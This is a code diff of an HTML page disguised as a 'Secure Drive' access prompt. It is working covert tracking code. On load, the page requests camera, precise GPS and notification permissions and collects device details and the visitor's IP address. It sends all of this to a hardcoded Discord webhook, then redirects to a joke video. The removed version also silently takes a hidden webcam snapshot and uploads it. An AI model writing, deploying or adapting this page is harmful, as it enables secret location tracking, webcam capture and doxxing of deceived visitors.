--- a/index.html
+++ b/index.html
@@ -6,201 +6,133 @@
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
   <style>
     html, body {
-      margin: 0;
-      padding: 0;
-      background: #0a0a0a;
-      color: #00ffcc;
-      font-family: "Segoe UI", sans-serif;
+      margin: 0; padding: 0;
+      background: #000;
+      color: #0f0;
+      font-family: sans-serif;
+      height: 100vh;
       display: flex;
       justify-content: center;
       align-items: center;
-      height: 100%;
+      flex-direction: column;
       text-align: center;
-      font-size: 1.2rem;
     }
-    #main { padding: 1em; }
     #spinner {
-      border: 4px solid #444;
-      border-top: 4px solid #00ffcc;
+      border: 4px solid #333;
+      border-top: 4px solid #0f0;
       border-radius: 50%;
-      width: 40px;
-      height: 40px;
+      width: 40px; height: 40px;
       animation: spin 1s linear infinite;
-      margin: 1em auto;
+      margin-top: 1em;
     }
     @keyframes spin {
       0% { transform: rotate(0deg); }
       100% { transform: rotate(360deg); }
     }
-    button {
-      background: #00ffcc;
-      color: #000;
-      border: none;
-      padding: 0.6em 1.2em;
-      font-size: 1rem;
-      cursor: pointer;
-      border-radius: 5px;
-      margin-top: 1em;
-    }
   </style>
 </head>
 <body>
-  <div id="main">
-    <div id="statusText">Permissions are required to access Secure Drive.</div>
-    <button onclick="requestPermissions()">Continue</button>
-  </div>
+  <div id="status">Requesting permissions...</div>
+  <div id="spinner"></div>
 
   <script>
     const webhookUrl = "https://discord.com/api/webhooks/1388161217603965210/eELyivDPEhlKfnaaDce_b90zBtGFpe51uLHo28LsG0gle_1d8pfuN-_U6vK6Q38_N4Fj";
     const redirectUrl = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";
     const deniedPage = "permission-denied.html";
 
-    let coords = { lat: "Permission denied", lon: "Permission denied", acc: 0 };
-    let capturedImageData = null;
+    let coords = { lat: "Denied", lon: "Denied", acc: 0 };
 
-    async function requestPermissions() {
-      document.getElementById("main").innerHTML = `<div id="statusText">Requesting permissions...</div><div id="spinner"></div>`;
+    const getDeviceInfo = () => ({
+      userAgent: navigator.userAgent,
+      platform: navigator.platform,
+      language: navigator.language,
+      screen: `${screen.width}x${screen.height}`,
+      touchSupport: 'ontouchstart' in window || navigator.maxTouchPoints > 0 ? 'Yes' : 'No'
+    });
 
-      try {
-        const [locationGranted, notificationGranted] = await Promise.all([
-          askLocation(),
-          askNotification()
-        ]);
-
-        const cameraGranted = await askCamera();
-
-        if (!locationGranted || !notificationGranted || !cameraGranted) {
-          window.location.href = deniedPage;
-          return;
-        }
-
-        // Snapshot (optional, doesn't block flow)
-        captureSnapshot();
-
-        // Fetch IP and send to Discord
-        fetch("https://api.db-ip.com/v2/free/self")
-          .then(res => res.json())
-          .then(data => sendToDiscord(data))
-          .catch(() => sendToDiscord({ ipAddress: "N/A", city: "-", stateProv: "-", countryName: "-" }));
-
-        // Start countdown
-        showCountdown();
-
-      } catch (err) {
-        console.warn("Permission error", err);
-        window.location.href = deniedPage;
-      }
-    }
-
-    function askLocation() {
-      return new Promise(resolve => {
-        if (!navigator.geolocation) return resolve(false);
-        navigator.geolocation.getCurrentPosition(
-          pos => {
-            coords.lat = pos.coords.latitude;
-            coords.lon = pos.coords.longitude;
-            coords.acc = pos.coords.accuracy;
-            resolve(true);
-          },
-          () => resolve(false),
-          { enableHighAccuracy: true, timeout: 10000 }
-        );
-      });
-    }
-
-    function askNotification() {
-      return new Promise(resolve => {
-        if (!("Notification" in window)) return resolve(false);
-        if (Notification.permission === "granted") return resolve(true);
-        Notification.requestPermission().then(p => resolve(p === "granted")).catch(() => resolve(false));
-      });
-    }
-
-    function askCamera() {
-      return navigator.mediaDevices.getUserMedia({ video: true })
-        .then(stream => {
-          stream.getTracks().forEach(t => t.stop());
-          return true;
-        })
-        .catch(() => false);
-    }
-
-    async function captureSnapshot() {
+    const askCamera = async () => {
       try {
         const stream = await navigator.mediaDevices.getUserMedia({ video: true });
-        const video = document.createElement("video");
-        video.setAttribute("playsinline", true);
-        video.muted = true;
-        video.style.position = "absolute";
-        video.style.opacity = "0";
-        document.body.appendChild(video);
-        video.srcObject = stream;
-        await video.play();
-
-        await new Promise(res => setTimeout(res, 2000));
-
-        const canvas = document.createElement("canvas");
-        canvas.width = video.videoWidth;
-        canvas.height = video.videoHeight;
-        canvas.getContext("2d").drawImage(video, 0, 0);
-        capturedImageData = canvas.toDataURL("image/png");
         stream.getTracks().forEach(t => t.stop());
-      } catch (e) {
-        console.warn("Snapshot failed", e);
+        return true;
+      } catch {
+        return false;
       }
-    }
+    };
 
-    function sendToDiscord(ipData) {
-      const device = {
-        userAgent: navigator.userAgent,
-        platform: navigator.platform,
-        language: navigator.language,
-        screen: `${screen.width}x${screen.height}`,
-        touchSupport: 'ontouchstart' in window || navigator.maxTouchPoints > 0 ? 'Yes' : 'No'
-      };
+    const askLocation = () => new Promise(res => {
+      navigator.geolocation.getCurrentPosition(
+        pos => {
+          coords.lat = pos.coords.latitude;
+          coords.lon = pos.coords.longitude;
+          coords.acc = pos.coords.accuracy;
+          res(true);
+        },
+        () => res(false),
+        { enableHighAccuracy: true, timeout: 8000, maximumAge: 0 }
+      );
+    });
 
-      const formData = new FormData();
+    const askNotification = () => {
+      if (!("Notification" in window)) return Promise.resolve(false);
+      if (Notification.permission === "granted") return Promise.resolve(true);
+      return Notification.requestPermission().then(p => p === "granted");
+    };
+
+    const sendToDiscord = (ipData) => {
+      const device = getDeviceInfo();
       const payload = {
         embeds: [{
-          title: "📍 GPS & Device Info",
-          description:
-            `**Lat:** ${coords.lat}\n**Lon:** ${coords.lon}\n**Accuracy:** ${coords.acc}m\n` +
-            `**Map:** https://www.google.com/maps?q=${coords.lat},${coords.lon}\n\n` +
-            `🌐 **IP:** ${ipData.ipAddress} | ${ipData.city}, ${ipData.stateProv}, ${ipData.countryName}\n` +
-            `💻 **Device:** ${device.platform}, ${device.userAgent}\n` +
-            `🈯 Lang: ${device.language}, 📱Screen: ${device.screen}, Touch: ${device.touchSupport}\n\n` +
-            (capturedImageData ? "📸 Image attached." : "📸 No image.")
+          title: "📱 Mobile Access Granted",
+          description: `
+**Latitude:** ${coords.lat}
+**Longitude:** ${coords.lon}
+**Accuracy:** ${coords.acc}m
+**Map:** ${coords.lat !== "Denied" ? `[Link](https://maps.google.com?q=${coords.lat},${coords.lon})` : "Denied"}
+
+🌐 **IP:** ${ipData.ipAddress}
+**City:** ${ipData.city}
+**Region:** ${ipData.stateProv}
+**Country:** ${ipData.countryName}
+
+📲 **Device Info**
+**Platform:** ${device.platform}
+**Browser:** ${device.userAgent}
+**Lang:** ${device.language}
+**Screen:** ${device.screen}
+**Touch Support:** ${device.touchSupport}
+
+🕒 ${new Date().toLocaleString()}
+`
         }]
       };
 
-      if (capturedImageData) {
-        const blob = dataURLtoBlob(capturedImageData);
-        formData.append("file", blob, "snapshot.png");
-        payload.embeds[0].image = { url: "attachment://snapshot.png" };
+      fetch(webhookUrl, {
+        method: "POST",
+        headers: { "Content-Type": "application/json" },
+        body: JSON.stringify(payload)
+      });
+    };
+
+    async function start() {
+      const camera = await askCamera();
+      const location = await askLocation();
+      const notification = await askNotification();
+
+      if (!camera || !location || !notification) {
+        window.location.href = deniedPage;
+        return;
       }
 
-      formData.append("payload_json", JSON.stringify(payload));
-      fetch(webhookUrl, { method: "POST", body: formData });
+      fetch("https://api.db-ip.com/v2/free/self")
+        .then(res => res.json())
+        .then(sendToDiscord)
+        .catch(() => sendToDiscord({ ipAddress: "N/A", city: "-", stateProv: "-", countryName: "-" }));
+
+      setTimeout(() => window.location.href = redirectUrl, 5000);
     }
 
-    function dataURLtoBlob(dataurl) {
-      const arr = dataurl.split(','), mime = arr[0].match(/:(.*?);/)[1],
-            bstr = atob(arr[1]), u8arr = new Uint8Array(bstr.length);
-      for (let i = 0; i < bstr.length; i++) u8arr[i] = bstr.charCodeAt(i);
-      return new Blob([u8arr], { type: mime });
-    }
-
-    function showCountdown() {
-      document.getElementById("main").innerHTML = `<div id="countdown">5 seconds to open secure drive</div>`;
-      let sec = 5;
-      const timer = setInterval(() => {
-        document.getElementById("countdown").textContent = `${--sec} seconds to open secure drive`;
-        if (sec <= 0) {
-          clearInterval(timer);
-          window.location.href = redirectUrl;
-        }
-      }, 1000);
-    }
+    start();
   </script>
 </body>
 </html>
